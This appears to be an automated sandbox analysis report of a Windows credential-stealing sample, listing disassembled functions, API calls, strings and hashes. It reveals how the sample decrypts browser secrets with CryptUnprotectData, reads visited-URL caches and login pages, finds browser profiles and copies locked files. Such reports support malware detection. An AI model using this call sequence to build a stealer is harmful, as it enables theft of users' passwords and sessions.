                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                          • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                          • String ID: chp$v10
                                                                                                                          • API String ID: 229402216-2783969131
                                                                                                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                          • API String ID: 3957639419-1740548384
                                                                                                                          • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                          • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                          • String ID: bhv
                                                                                                                          • API String ID: 4234240956-2689659898
                                                                                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                          • __set_app_type.MSVCRT ref: 00446762
                                                                                                                          • __p__fmode.MSVCRT ref: 00446777
                                                                                                                          • __p__commode.MSVCRT ref: 00446785
                                                                                                                          • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                          • _initterm.MSVCRT ref: 004467C7
                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                          • _initterm.MSVCRT ref: 004467FD
                                                                                                                          • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                          • exit.MSVCRT ref: 00446897
                                                                                                                          • _cexit.MSVCRT ref: 0044689D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2791496988-0
                                                                                                                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                          • String ID: visited:
                                                                                                                          • API String ID: 2470578098-1702587658
                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                          • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                          • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                          • String ID: r!A
                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                          • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                          • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                          • String ID: BIN
                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                          • API String ID: 4039892925-11920434
                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
